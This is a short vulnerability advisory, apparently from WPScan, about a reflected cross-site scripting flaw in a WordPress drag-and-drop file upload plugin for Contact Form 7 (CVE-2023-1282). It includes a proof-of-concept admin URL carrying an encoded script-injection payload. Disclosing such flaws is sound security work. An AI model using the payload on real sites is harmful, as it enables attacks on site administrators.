Lucene search
Alex SanfordWPVDB-ID:F4B2617F-5235-4587-9EAF-D0F6BB23DC27HistoryMar 21, 2023 - 12:00 a.m.
Drag and Drop Multiple File Upload PRO - Contact Form 7 with Remote Storage Integrations < 5.0.6.4 - Reflected Cross-Site Scripting
2023-03-2100:00:00
Alex Sanford
wpscan.com
7
cross-site scripting
reflected
parameter sanitisation
remote storage integrations
wordpress
EPSS
0.001
Percentile
45.6%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.
PoC
Visit the following path on the site as an admin user: /wp-admin/admin.php?page=drag-n-drop-upload&tab;=pro-features%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
Related
cve
cve
CVE-2023-1282
2023-04-17 13:15:38
wpexploit
wpexploit
prion
prion
Cross site scripting
2023-04-17 13:15:00
cvelist
cvelist
wpvulndb
wpvulndb
nvd
nvd
CVE-2023-1282
2023-04-17 13:15:38